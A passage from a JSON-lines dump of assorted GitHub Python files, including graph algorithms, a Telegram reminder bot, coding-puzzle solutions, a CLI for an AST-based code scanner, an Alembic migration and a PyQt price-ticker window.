[\"spanish\", \"english\", \"italian\"]\n colleagues = [\"Manolo\", \"Cherryl\", \"Luigi\"]\n\n # Call decompose method\n user.validate_user()\n\n #Guard Clause for language not found\n if language not in available_languages:\n print(\"Language not Found\")\n\n for colleague in colleagues:\n #Guard Clause for is_foreign user\n if not user.is_foreign:\n greeting = \"hi\"\n\n if language == \"spanish\": \n greeting = \"hola\"\n if language == \"english\":\n greeting = \"hi\"\n if language == \"italian\":\n greeting = \"hi\"\n \n # Consolidate duplicades\n user.say_hello(f\"{greeting} {colleague}\")","repo_name":"pacocampo/arrow_code_antipattern","sub_path":"arrow_code/refactor/3_decompose.py","file_name":"3_decompose.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"45005375206","text":"from Utils.utils import *\nfrom 
UserBot.bot import bot\nfrom config import CLIENT_TOKEN\nfrom UserBot.templates import package_size_end_soon_template, package_days_expire_soon_template\ntry:\n bot.remove_webhook()\nexcept:\n pass\n\nsettings = all_configs_settings()\nALERT_PACKAGE_GB = settings.get('reminder_notification_usage', 3)\nALERT_PACKAGE_DAYS = settings.get('reminder_notification_days', 3)\n\n\ndef alert_package_gb(package_remaining_gb):\n if package_remaining_gb <= ALERT_PACKAGE_GB:\n return True\n return False\n\n\ndef alert_package_days(package_remaining_days):\n if package_remaining_days <= ALERT_PACKAGE_DAYS:\n return True\n return False\n\n\n# Send a reminder to users about their packages\ndef cron_reminder():\n if not CLIENT_TOKEN:\n return\n if not settings['reminder_notification']:\n return\n\n telegram_users = USERS_DB.select_users()\n if telegram_users:\n for user in telegram_users:\n user_telegram_id = user['telegram_id']\n user_subscriptions_list = non_order_user_info(user_telegram_id) + order_user_info(user_telegram_id)\n if user_subscriptions_list:\n for user_subscription in user_subscriptions_list:\n package_days = user_subscription.get('remaining_day', 0)\n package_gb = user_subscription.get('usage', {}).get('remaining_usage_GB', 0)\n sub_id = user_subscription.get('sub_id')\n if package_days == 0:\n continue\n if alert_package_gb(package_gb):\n bot.send_message(user_telegram_id, package_size_end_soon_template(sub_id, package_gb))\n if alert_package_days(package_days):\n bot.send_message(user_telegram_id, package_days_expire_soon_template(sub_id, package_days))\n","repo_name":"B3H1Z/Hiddify-Telegram-Bot","sub_path":"Cronjob/reminder.py","file_name":"reminder.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":123,"dataset":"github-code","pt":"76"} +{"seq_id":"7625936692","text":"from cola import Cola\nfrom pila import Pila\nimport random\n\n\n'''\nRecibe un grafo y un vertice de origen y recorre todos los vertices \nposibles a partir del origen que pertenezcan a niveles inferiores o iguales\nal dado por parametro. Devuelve un diccionario con los padres de cada\nvertice recorrido.\n'''\ndef bfs_por_nivel(grafo, origen, nivel):\n visitados = set()\n padres = {}\n orden = {}\n q = Cola()\n v = origen\n visitados.add(v)\n padres[v] = None\n orden[v] = 0\n q.encolar(v)\n while not q.esta_vacia():\n v = q.desencolar()\n for w in grafo.adyacentes(v):\n if w not in visitados:\n orden[w] = orden[v] + 1\n if orden[w] == nivel + 1:\n break\n visitados.add(w)\n padres[w] = v\n q.encolar(w)\n return padres\n\n'''\nRecibe un grafo y dos vertices. Recorre el camino minimo\nen cantidad de aristas desde el vertice de origen hasta el\nvertice de destino. Devuelve el camino desde el origen\nhasta el destino. Si no hay camino devuelve None.\n'''\n\ndef camino_bfs(grafo, origen, des):\n visitados = set()\n padres = {}\n camino = []\n q = Cola()\n visitados.add(origen)\n padres[origen] = None\n q.encolar(origen)\n while not q.esta_vacia():\n v = q.desencolar()\n if v == des:\n break\n for w in grafo.adyacentes(v):\n if w not in visitados:\n visitados.add(w)\n padres[w] = v\n q.encolar(w)\n\n if des not in visitados:\n return None\n v = des\n while v != None:\n camino.insert(0, v)\n v = padres[v]\n return camino\n\n'''\nRecibe un grafo. Devuelve los grados de salida\npara cada vertice en forma de diccionario. 
En caso de ser\nno dirigido simplemente devuelve los grados.\n'''\ndef grados_salida(grafo):\n grados = {}\n for v in grafo:\n grados[v] = len(grafo.adyacentes(v))\n return grados\n \n'''\nFuncion recursiva de cfc.\n'''\n\ndef _cfc(grafo, v, mb, orden, visitados, apilados, pila, orden_global, componentes):\n visitados.add(v)\n apilados.add(v)\n pila.apilar(v)\n mb[v] = orden[v] = orden_global\n orden_global += 1\n \n for w in grafo.adyacentes(v):\n if w not in visitados:\n orden_global = _cfc(grafo, w, mb, orden, visitados, apilados, pila, orden_global, componentes)\n if w in apilados:\n if mb[w] < mb[v]:\n mb[v] = mb[w]\n\n if mb[v] == orden[v] and (not pila.esta_vacia()):\n nueva_cfc = []\n while True:\n w = pila.desapilar()\n apilados.remove(w)\n nueva_cfc.append(w)\n if w == v:\n break\n componentes.append(nueva_cfc)\n\n return orden_global\n\n'''\nRecibe un grafo. Calcula sus componentes fuertemente conexas y las devuelve.\n'''\n\ndef cfc(grafo):\n apilados = set()\n visitados = set()\n pila = Pila()\n orden = {}\n mb = {}\n componentes = []\n or_glo = 0\n for v in grafo:\n if v not in visitados:\n or_glo = _cfc(grafo,v,mb,orden,visitados,apilados,pila,or_glo,componentes)\n return componentes\n\n\n'''\nRecibe un grafo. Calcula y devuelve las comunidades del mismo.\n(vertices altamente conectados entre si).\n'''\ndef label_propagation(grafo):\n labels = {}\n comunidades = {}\n i = 0\n\n for v in grafo:\n labels[v] = i\n i += 1\n \n i = 0 \n while i != 10:\n i += 1\n comunidades = {}\n vertices =grafo.obtener_vertices()\n random.shuffle(vertices)\n \n for v in vertices:\n freq = {}\n for w in grafo.adyacentes(v):\n if labels[w] not in freq:\n freq[labels[w]] = 1\n else:\n freq[labels[w]] += 1\n\n max = 0\n clave = None\n for key in freq:\n if freq[key] > max:\n max = freq[key]\n clave = key\n \n labels[v] = clave\n\n for v in labels:\n if labels[v] not in comunidades:\n comunidades[labels[v]] = []\n comunidades[labels[v]].append(v)\n \n return comunidades\n\n'''\nRecibe un grafo y devuelve los vertices de entrada\npara cada vertice del mismo.\n'''\ndef vertices_entrada(grafo):\n v_entrada = {}\n for v in grafo:\n if v not in v_entrada:\n v_entrada[v] = set()\n\n for w in grafo.adyacentes(v):\n if w not in v_entrada:\n v_entrada[w] = set()\n\n v_entrada[w].add(v)\n return v_entrada\n \n'''\nRecibe un grafo y calcula un ranking de importancia para cada vertice dentro\ndel grafo. 
Devuelve ese ranking en forma de diccionario.\n'''\n\ndef page_rank(grafo):\n pr = {}\n cant = len(grafo.obtener_vertices())\n for v in grafo:\n pr[v] = 1 / cant\n \n entrada = vertices_entrada(grafo)\n \n new_pr = {}\n for i in range(50): #cantidad de iteraciones para converger\n for v in grafo:\n new_pr[v] = (1 - 0.85) / cant\n visitados = set()\n for w in entrada[v]:\n if w == v:\n continue\n new_pr[v] += 0.85 * (pr[w] / len(grafo.adyacentes(w)))\n pr = new_pr\n new_pr = {}\n \n return pr\n\n\n'''\nFuncion recursiva para calcular ciclo de largo n.\n'''\ndef _dfs_ciclo_largo_n(grafo, v, origen, n, visitados, camino_actual):\n camino_actual.append(v)\n visitados.add(v)\n if len(camino_actual) == n:\n if origen in grafo.adyacentes(v):\n camino_actual.append(origen)\n return camino_actual\n else:\n camino_actual.pop()\n visitados.remove(v)\n return None\n \n for w in grafo.adyacentes(v):\n if w not in visitados:\n solucion = _dfs_ciclo_largo_n(grafo, w, origen, n, visitados, camino_actual)\n if solucion is not None:\n return solucion\n camino_actual.pop()\n visitados.remove(v)\n return None\n\n\n\n'''\nRecibe un grafo y un vertice. Busca un camino simple que tenga longitud\nn y empiece y termine en el vertice dado. De no encontrar el camino \ndevuelve None.\n'''\ndef ciclo_largo_n(grafo, origen ,n):\n return _dfs_ciclo_largo_n(grafo, origen , origen,n, set(), [])\n ","repo_name":"bertichelucas/Algoritmos-y-Programacion-II","sub_path":"TP3/funciones_grafos.py","file_name":"funciones_grafos.py","file_ext":"py","file_size_in_byte":6308,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2057580277","text":"import os,re,sys,shutil\nfrom random import randrange\nfrom shutil import copyfile\n\ndef main(oldroot,newroot):\n if (not os.path.exists(oldroot)):\n return\n if(os.path.exists(newroot)):\n shutil.rmtree(newroot)\n for root, dirs, files in os.walk(oldroot):\n substr = re.sub(oldroot, '', root)\n curroot = newroot + substr\n os.mkdir(curroot)\n if files:\n nofiles = int(len(files) / 10)\n while nofiles != 0:\n randomnum = randrange(0, len(files))\n copyfile(root + '/' + files[randomnum], curroot + '/' + files[randomnum])\n files.pop(randomnum)\n nofiles -= 1\n\nif __name__ == '__main__':\n oldroot=sys.argv[1]\n newroot=sys.argv[2]\n main(oldroot,newroot)","repo_name":"adarshsuresh/Python","sub_path":"Perceptron/DataGenerator10.py","file_name":"DataGenerator10.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16437265857","text":"# !/usr/bin/env python\n# _*_coding:utf-8 _*_\n# @Time : 2023/5/26 14:34\n# @Author : yufeng.wang@we-med.com\n# @Site :\n# @File : addProductKindPage.py\n# @Software : PyCharm\nimport time\n\nfrom common.basePage import BasePage\n\n\nclass AddProductKindPage(BasePage):\n \"\"\"\n 添加商品分类\n \"\"\"\n\n def add_product_kind(self, kind_name, kind_idx, number, show, show_navigation, show_home_page, action=None):\n \"\"\"\n 添加商品分类\n :param kind_name:分类名称\n :param kind_idx:上级分类\n :param number:数量\n :param show:是否展示\n :param show_navigation:是否展示在导航栏\n :param show_home_page:是否展示在主页\n :param action:\n :return:\n \"\"\"\n # 输入分类名称\n time.sleep(2)\n self.input_text(self.cate_name_input, kind_name)\n # 点击上级分类\n self.click(self.kind_select)\n # 选择上级分类\n self.kind_select_idx[-1] = self.kind_select_idx[-1].replace(\"%s\", kind_idx)\n # 数量单位\n self.input_text(self.number_input, number)\n # 是否显示\n self.is_show[-1] = 
self.is_show[-1].replace(\"%s\", show)\n self.click(self.is_show)\n # 是否展示导航栏\n self.is_show_navigation[-1] = self.is_show_navigation[-1].replace(\"%s\", show_navigation)\n self.click(self.is_show_navigation)\n # 是否展示在首页\n self.is_show_home_page[-1] = self.is_show_home_page[-1].replace(\"%s\", show_home_page)\n self.click(self.is_show_home_page)\n self.click(self.submit_btn)\n self.click(self.primary_submit_btn)\n","repo_name":"wangyufeng-github/web-autotest","sub_path":"pageObjects/productManage/addProductKindPage.py","file_name":"addProductKindPage.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"75119886644","text":"import telebot\nimport os\nfrom telebot.types import Message\n\nfrom src.utils.config import Config\n\n# run this bot and type /id to get chat id for \"config.json\"'s \"telegram_chat_id_list\"\n\nif __name__ == \"__main__\":\n config_path = os.path.abspath(os.path.join(\"..\", \"..\", \"..\", \"config.json\"))\n bot = telebot.TeleBot(Config(config_path).telegram_token)\n\n @bot.message_handler(commands=[\"id\"])\n def echo_message(message: Message):\n repl = \"Chat ID: \" + str(message.chat.id) + \"\\n\"\n repl += \"User ID: \" + str(message.from_user.id) + \"\\n\"\n bot.send_message(message.chat.id, repl, disable_notification=True)\n bot.delete_message()\n\n bot.infinity_polling()\n","repo_name":"StillMonad/DiscordMonitoringBot","sub_path":"src/utils/telegram_helper_bot/telegram_bot_main.py","file_name":"telegram_bot_main.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"11900327998","text":"def prepare(data):\n coordinates = set()\n max_row = 0\n max_column = 0\n\n for line in data:\n r, c = map(int, line.split(\", \"))\n coordinates.add((r, c))\n max_row = max(max_row, r)\n max_column = max(max_column, c)\n return coordinates, max_column, max_row\n\n\ndef main(data, manhattan_limit=10000):\n coordinates, max_row, max_column = prepare(data)\n region_size = 0\n\n for i in range(max_row + 1):\n for j in range(max_column + 1):\n region_size += int(sum(abs(r - i) + abs(c - j) for r, c in coordinates) < manhattan_limit)\n\n return region_size\n\n\nif __name__ == '__main__':\n print(main([line.strip() for line in open('data.txt').readlines()]))\n","repo_name":"ypankovych/Advent-of-Code-2018","sub_path":"Day 6 Chronal Coordinates/Part Two/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"18308983934","text":"class Solution:\n def findCriticalAndPseudoCriticalEdges(self, n: int, edges: List[List[int]]) -> List[List[int]]:\n critical = []\n pseudo = []\n\n def cal(list1, skip):\n res = 0\n father = [i for i in range(n)]\n\n def find(x):\n if x == father[x]:\n return x\n father[x] = find(father[x])\n return father[x]\n\n def union(x, y):\n fa1 = find(x)\n fa2 = find(y)\n if fa1 != fa2:\n father[fa1] = fa2\n\n for i, (x, y, weight, _) in enumerate(list1):\n if i == skip:\n continue\n if find(x) != find(y):\n res += weight\n union(x, y)\n\n for i in range(n):\n if find(i) != find(0):\n return float('inf')\n\n return res\n\n for i in range(len(edges)):\n edges[i].append(i)\n edges.sort(key=lambda x: x[2])\n mst = cal(edges, -1)\n for i in range(len(edges)):\n if cal(edges, i) > mst:\n critical.append(edges[i][3])\n else:\n edges = [edges[i][::]] + 
edges\n if cal(edges, -1) == mst:\n pseudo.append(edges[i + 1][3])\n edges = edges[1:]\n\n return [critical, pseudo]\n","repo_name":"jiangruofan/algorithm","sub_path":"1489. Find Critical and Pseudo-Critical Edges in Minimum Spanning Tree.py","file_name":"1489. Find Critical and Pseudo-Critical Edges in Minimum Spanning Tree.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72566402485","text":"import datetime\nimport os\n\nfrom . import visitors\nfrom .common import Colors, Log\nfrom .scanner import Scanner\n\n\n# CLI interface\nclass Interface:\n PARAMS = {\n \"arg_string\": {\"args\": [\"-a\", \"--args\"], \"value\": True, \"default\": \"\", \"help\": \"Arguments for method\"},\n \"help\": {\"args\": [\"-h\", \"--help\"], \"value\": False, \"help\": \"Show help and exit\"},\n \"extensions\": {\"args\": [\"-e\", \"--extensions\"], \"value\": True, \"default\": \"py\", \"help\": \"Extensions to process\"},\n \"grepable\": {\"args\": [\"-g\", \"--grepable\"], \"value\": False, \"help\": \"Make results easier to grep\"},\n \"no_colors\": {\"args\": [\"-c\", \"--no-colors\"], \"value\": False, \"help\": \"Don't print colors\"},\n \"no_source\": {\"args\": [\"-n\", \"--no-source\"], \"value\": False, \"help\": \"Don't print source code\"},\n \"path\": {\"args\": [\"-p\", \"--path\"], \"value\": True, \"default\": \".\", \"help\": \"Starting directory\"},\n \"skip\": {\"args\": [\"-s\", \"--skip\"], \"value\": True, \"default\": \"tests\", \"help\": \"Paths to skip\"},\n }\n\n def __init__(self, args):\n self.args = []\n self.name = args[0]\n self.method = None\n self.visitors = {}\n\n # Load visitors\n for name in dir(visitors):\n if name.startswith(\"Visitor\"):\n visitor = getattr(visitors, name)\n if visitor.NAME:\n self.visitors[visitor.NAME] = visitor\n\n # Allow multiple short arguments in same argument\n for arg in args[1:]:\n if len(arg) > 1 and arg[0] == \"-\" and arg[1] != \"-\":\n self.args += [f\"-{x}\" for x in arg[1:]]\n else:\n self.args.append(arg)\n\n self.configure()\n\n self.clr = Colors(self.no_colors or os.environ.get(\"NO_COLOR\", False))\n self.log = Log(self.clr)\n\n if self.help or self.method is None:\n self.print_help()\n\n self.scanner_config = {\n \"extensions\": self.extensions.split(\",\"),\n \"skip\": self.skip.split(\",\"),\n \"grepable\": self.grepable,\n \"print_source\": not self.no_source,\n \"visitor_configs\": self.get_visitor_configs(),\n }\n\n def get_visitor_config(self, method, arg_string):\n if method in self.visitors:\n visitor = self.visitors[method]\n else:\n self.log.error(f'Unknown method \"{method}\"')\n\n visitor_args, visitor_kwargs = self.parse_visitor_args(arg_string)\n return {\n \"visitor\": visitor,\n \"args\": visitor_args,\n \"kwargs\": visitor_kwargs,\n }\n\n def get_visitor_configs(self):\n visitor_configs = []\n\n if self.method == \"file\":\n # Configure visitors from file\n try:\n with open(self.arg_string, \"r\") as f:\n lines = [line.strip() for line in f.readlines()]\n except Exception as e:\n self.log.error(f'Error reading \"{self.arg_string}\": {e}')\n\n for line in lines:\n if not line or line.startswith(\"#\"):\n continue\n\n if \":\" in line:\n method, arg_string = line.strip().split(\":\", 1)\n else:\n method, arg_string = line, \"\"\n\n visitor_configs.append(self.get_visitor_config(method.strip(), arg_string.strip()))\n else:\n # Configure visitors from CLI arguments\n 
visitor_configs.append(self.get_visitor_config(self.method, self.arg_string))\n\n return visitor_configs\n\n def configure(self):\n param = None\n\n for key, value in self.PARAMS.items():\n setattr(self, key, value.get(\"default\", False))\n\n for arg in self.args:\n if param is not None:\n setattr(self, param, arg)\n param = None\n continue\n\n found = False\n\n for key, value in self.PARAMS.items():\n if arg in value[\"args\"]:\n if value[\"value\"]:\n param = key # Parameter takes value\n found = True\n else:\n setattr(self, key, True) # Parameter is a flag\n found = True\n\n if not found:\n if self.method is None:\n self.method = arg\n else:\n self.help = True\n\n def f(self, string, length):\n if len(string) > length:\n return string[: length - 3] + \"...\"\n else:\n return string + \" \" * (length - len(string))\n\n def parse_visitor_args(self, arg_string):\n args, kwargs = [], {}\n\n for arg in arg_string.split(\",\"):\n arg = arg.strip()\n if not arg:\n continue\n\n parts = arg.split(\"=\", 1)\n\n if len(parts) == 1:\n args.append(parts[0])\n else:\n kwargs[parts[0]] = parts[1]\n\n return args, kwargs\n\n def print_help(self):\n methods, params, usage = ([], []), [], []\n\n for method in sorted(self.visitors.keys()):\n visitor = self.visitors[method]\n args = \" ({})\".format(\", \".join(visitor.ARGS)) if visitor.ARGS else \"\"\n group = 0 if visitor.COMMON else 1\n methods[group].append(f\" {method:25} {visitor.HELP}{args}\")\n\n for x in self.PARAMS.values():\n param = \" \" if x[\"value\"] else \"\"\n usage.append(f'[{x[\"args\"][0]}{param}]')\n params.append(\" {:25} {}\".format(f'{x[\"args\"][0]}|{x[\"args\"][1]}{param}', x[\"help\"]))\n\n print(\n \"\\n\".join(\n [\n \"Astvuln: Search Python code for AST patterns.\",\n \"Usage: {}\".format(\"\".join(usage)),\n \"\\nOptions:\\n{}\".format(\"\\n\".join(params)),\n \"\\nCommon methods:\\n{}\".format(\"\\n\".join(methods[0])),\n \"\\nCustom methods:\\n{}\".format(\"\\n\".join(methods[1])),\n \"\\nReading methods from file:\",\n ' Run method \"file\" and pass filename in method arguments to run multiple methods in a single run.',\n \" Each method needs to be specified in a single line and colon-seperated from arguments.\",\n ' E. g. 
\"./astvuln foo -a bar,baz\" would be translated to:',\n \" foo:bar,baz\",\n \"\\nExamples:\",\n \" ./astvuln -h # Print help\",\n \" ./astvuln print -c # Run method `print` without color output\",\n \" ./astvuln dump -p dir # Run method `dump` on directory `dir`\",\n \" ./astvuln call -a bytes # Run method `call` with argument `bytes`\",\n \" ./astvuln foo -a a=1,b=2 # Run method `foo` with arguments a = 1 and b = 2\",\n \" ./astvuln file -a methods.txt # Run multiple methods specified in a file\",\n ]\n )\n )\n\n exit()\n\n def print_greeting(self):\n conf = self.scanner_config\n flags = []\n\n if self.log.clr.no_colors:\n flags.append(\"no colors\")\n if conf[\"grepable\"]:\n flags.append(\"grepable\")\n\n greeting = [\n \"+---------------------------------[ astvuln ]---------------------------------+\",\n \"| Date: {} |\".format(self.f(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"), 63)),\n \"| Path: {} |\".format(self.f(self.path, 63)),\n \"| Extensions: {} |\".format(self.f(\", \".join(conf[\"extensions\"]), 63)),\n \"| Skip: {} |\".format(self.f(\", \".join(conf[\"skip\"]), 63)),\n \"| Flags: {} |\".format(self.f(\", \".join(flags), 63)),\n \"+-----------------------------------------------------------------------------+\",\n ]\n\n for visitor_config in conf[\"visitor_configs\"]:\n greeting += [\n \"| Method: {} |\".format(self.f(visitor_config[\"visitor\"].NAME, 63)),\n \"| {} |\".format(self.f(visitor_config[\"visitor\"].HELP, 63)),\n \"| Params: {} |\".format(self.f(\", \".join(visitor_config[\"visitor\"].ARGS), 63)),\n \"| Args: {} |\".format(self.f(\", \".join(visitor_config[\"args\"]), 63)),\n \"| Kwargs: {} |\".format(\n self.f(\", \".join([f\"{k}={v}\" for k, v in visitor_config[\"kwargs\"].items()]), 63)\n ),\n \"+-----------------------------------------------------------------------------+\",\n ]\n\n self.log.plain(\"\\n\".join(greeting), self.log.clr.INFO)\n\n def run(self):\n self.print_greeting()\n\n start = datetime.datetime.now()\n scanner = Scanner(self.log, **self.scanner_config)\n\n try:\n scanner.scan(self.path)\n except KeyboardInterrupt:\n self.log.info(\"Interrupted, exiting\")\n\n duration = datetime.datetime.now() - start\n self.log.info(\n \"Ran {} rules on {} files: {} findings in {}\".format(\n len(scanner.visitors), scanner.n_files, scanner.n_findings, duration\n )\n )\n","repo_name":"bitstamp-security/astvuln","sub_path":"src/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":9289,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"76"} +{"seq_id":"14767776395","text":"import os.path as osp\nfrom glob import glob\nimport re\n\nclass DataSet(object):\n def __init__(self, data_dir, name='makret', info=True):\n self.name = name\n self.images_dir = osp.join(data_dir, name)\n self.train_path = 'bounding_box_train'\n self.train_camstyle_path = 'bounding_box_train_camstyle'\n self.query_path = 'query'\n self.gallery_path = 'bounding_box_test'\n\n self.train, self.query, self.gallery = [], [], []\n self.num_train_ids, self.num_query_ids, self.num_gallery_ids = 0, 0, 0\n\n self.cam_dict = self.set_cam_dict()\n self.num_cam = self.cam_dict[name]\n\n self.load(info)\n\n def set_cam_dict(self):\n cam_dict = {}\n cam_dict['market'] = 6\n cam_dict['duke'] = 8\n cam_dict['msmt17'] = 15\n return cam_dict\n\n def preprocess(self, images_dir, path, relabel=True):\n pattern = re.compile(r'([-\\d]+)_c([-\\d]+)')\n all_pids = {}\n idx2pid = []\n ret = []\n fpaths = sorted(glob(osp.join(images_dir, 
path, '*.jpg')))\n cnt = 0\n for fpath in fpaths:\n fname = osp.basename(fpath)\n pid, cam = map(int, pattern.search(fname).groups())\n if pid == -1: continue # junk images are just ignored\n if relabel:\n if pid not in all_pids:\n all_pids[pid] = len(all_pids)\n else:\n if pid not in all_pids:\n all_pids[pid] = pid\n pid = all_pids[pid]\n cam -= 1\n ret.append((fname, pid, cam, cnt))\n idx2pid.append(pid)\n cnt = cnt + 1\n if relabel:\n return ret, int(len(all_pids)), idx2pid\n else:\n return ret, int(len(all_pids))\n\n def load(self, info=True):\n self.train, self.num_train_ids, self.idx2pid = self.preprocess(self.images_dir, self.train_path)\n self.query, self.num_query_ids = self.preprocess(self.images_dir, self.query_path, relabel=False)\n self.gallery, self.num_gallery_ids = self.preprocess(self.images_dir, self.gallery_path, relabel=False)\n\n if info:\n print(self.__class__.__name__, self.name, \"loaded\")\n print(\" subset | # ids | # images\")\n print(\" ---------------------------\")\n print(\" train | 'Unknown' | {:8d}\"\n .format(len(self.train)))\n print(\" query | {:5d} | {:8d}\"\n .format(self.num_query_ids, len(self.query)))\n print(\" gallery | {:5d} | {:8d}\"\n .format(self.num_gallery_ids, len(self.gallery)))","repo_name":"kennethwdk/MLCReID","sub_path":"lib/datasets/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"76"} +{"seq_id":"462525941","text":"\"\"\"no limit on repo varchar columns\n\nRevision ID: f4f4c1b37f93\nRevises: 06af777f16c6\nCreate Date: 2023-06-08 15:22:06.327702\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# Polar Custom Imports\nfrom polar.kit.extensions.sqlalchemy import PostgresUUID\n\n# revision identifiers, used by Alembic.\nrevision = \"f4f4c1b37f93\"\ndown_revision = \"06af777f16c6\"\nbranch_labels: tuple[str] | None = None\ndepends_on: tuple[str] | None = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column(\n \"repositories\",\n \"license\",\n existing_type=sa.VARCHAR(length=50),\n type_=sa.VARCHAR(),\n existing_nullable=True,\n )\n op.alter_column(\n \"repositories\",\n \"homepage\",\n existing_type=sa.VARCHAR(length=128),\n type_=sa.VARCHAR(),\n existing_nullable=True,\n )\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! 
###\n op.alter_column(\n \"repositories\",\n \"homepage\",\n existing_type=sa.VARCHAR(),\n type_=sa.VARCHAR(length=128),\n existing_nullable=True,\n )\n op.alter_column(\n \"repositories\",\n \"license\",\n existing_type=sa.VARCHAR(),\n type_=sa.VARCHAR(length=50),\n existing_nullable=True,\n )\n # ### end Alembic commands ###\n","repo_name":"polarsource/polar","sub_path":"server/migrations/versions/2023-06-08_no_limit_on_repo_varchar_columns.py","file_name":"2023-06-08_no_limit_on_repo_varchar_columns.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":736,"dataset":"github-code","pt":"76"} +{"seq_id":"37565440462","text":"import math\nfrom typing import Set\n\nnumber = 600851475143\nseen = set()\n\ndef findFactors(num):\n factors = []\n maxNumber = int(math.sqrt(num))\n\n if num in seen:\n return [-1]\n\n for i in range(2, maxNumber):\n if num % i == 0:\n factors.append(i)\n factors.append(int(num / i))\n\n result = []\n\n for fact in factors:\n result.extend(findFactors(fact))\n\n if len(result) == 0:\n result.append(num)\n\n seen.add(num)\n\n return result\n\ndef main():\n factors_list = findFactors(number)\n\n factors_list.sort()\n # print(\"factors: {}\".format(factors_list))\n print(\"max prime factor: {}\".format(max(factors_list)))\n\nmain()\n\n","repo_name":"AndrewVetovitz/Project-Euler","sub_path":"problems/problem3.py","file_name":"problem3.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9544740592","text":"import os\nimport webbrowser\n\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtWidgets import QSystemTrayIcon, QAction, QMenu, qApp, QStyle\n\nimport main_design\n\nfrom PyQt5.QtCore import Qt\nfrom PyQt5 import QtWidgets, QtCore\n\n\ndef open_settings_in_editor():\n from sys import platform\n if platform == \"linux\" or platform == \"linux2\":\n osCommandString = 'gedit settings.json'\n os.system(osCommandString)\n elif platform == \"win32\":\n osCommandString = 'notepad.exe settings.json'\n os.system(osCommandString)\n\n\nclass MainApp(QtWidgets.QMainWindow, main_design.Ui_MainWindow):\n def __init__(self, settings_dict, config_sess, pairs_dict):\n super().__init__()\n self.setupUi(self)\n\n self.settings_dict = settings_dict\n self.config_sess = config_sess\n\n to_hide = [\n self.allert_symbol1, self.allert_symbol2, self.allert_symbol3,\n self.allert_symbol3, self.allert_symbol4, self.price_converted1,\n self.volume_converted1, self.high_converted1, self.low_converted1,\n self.price_converted2, self.volume_converted2, self.high_converted2,\n self.low_converted2, self.price_converted3, self.volume_converted3,\n self.high_converted3, self.low_converted3, self.price_converted4,\n self.volume_converted4, self.high_converted4, self.low_converted4\n ]\n\n for el in to_hide:\n el.hide()\n\n orders = [\n self.orders1, self.orders2, self.orders3, self.orders4\n ]\n\n self.toolbar_widget.setVisible(False)\n\n if not settings_dict['window']['orders']:\n for el in orders:\n el.setVisible(False)\n\n if settings_dict['window']['transparent']:\n self.setAttribute(Qt.WA_TranslucentBackground, True)\n\n if settings_dict['window']['pin']:\n self.setWindowFlags(QtCore.Qt.Window | Qt.WindowStaysOnTopHint)\n\n self.resize(self.minimumSize())\n self.setWindowOpacity(settings_dict['window']['opacity'])\n\n self.pair_group1.setTitle(settings_dict['pairs']['box1']['exchange'] + ':')\n 
self.pair_group2.setTitle(settings_dict['pairs']['box2']['exchange'] + ':')\n\n self.pairs_elements = {\n '0': {\n 'time': self.update_time1,\n 'pair_name': self.pair_name1,\n 'browser_button': self.browser_button1,\n 'price': self.price1, 'price_converted': self.price_converted1,\n 'volume': self.volume1, 'volume_converted': self.volume_converted1,\n 'high': self.high1, 'high_converted': self.high_converted1,\n 'low': self.low1, 'low_converted': self.low_converted1,\n 'buy': self.buy_table1, 'sell': self.sell_table1\n },\n '1': {\n 'time': self.update_time2,\n 'pair_name': self.pair_name2,\n 'browser_button': self.browser_button2,\n 'price': self.price2, 'price_converted': self.price_converted2,\n 'volume': self.volume2, 'volume_converted': self.volume_converted2,\n 'high': self.high2, 'high_converted': self.high_converted2,\n 'low': self.low2, 'low_converted': self.low_converted2,\n 'buy': self.buy_table2, 'sell': self.sell_table2\n },\n '2': {\n 'time': self.update_time3,\n 'pair_name': self.pair_name3,\n 'browser_button': self.browser_button3,\n 'price': self.price3, 'price_converted': self.price_converted3,\n 'volume': self.volume3, 'volume_converted': self.volume_converted3,\n 'high': self.high3, 'high_converted': self.high_converted3,\n 'low': self.low3, 'low_converted': self.low_converted3,\n 'buy': self.buy_table3, 'sell': self.sell_table3\n },\n '3': {\n 'time': self.update_time4,\n 'pair_name': self.pair_name4,\n 'browser_button': self.browser_button4,\n 'price': self.price4, 'price_converted': self.price_converted4,\n 'volume': self.volume4, 'volume_converted': self.volume_converted4,\n 'high': self.high4, 'high_converted': self.high_converted4,\n 'low': self.low4, 'low_converted': self.low_converted4,\n 'buy': self.buy_table4, 'sell': self.sell_table4\n }\n }\n\n self.link1 = None\n self.link2 = None\n self.link3 = None\n self.link4 = None\n\n if pairs_dict[0]['exchange'] == 'KuCoin':\n self.link1 = 